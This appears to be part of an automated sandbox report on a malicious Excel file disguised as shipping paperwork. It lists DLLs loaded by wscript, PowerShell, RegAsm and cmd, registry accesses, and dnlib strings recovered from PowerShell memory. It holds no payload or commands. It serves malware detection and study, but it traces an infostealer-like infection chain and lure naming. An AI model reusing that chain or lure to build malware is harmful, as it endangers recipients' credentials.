Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msacm32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pstorec.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: atl.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msacm32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn2.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn2.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls

Static file information: File size 1306112 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\ source: powershell.exe, 00000016.00000002.965643789.0000000004F53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
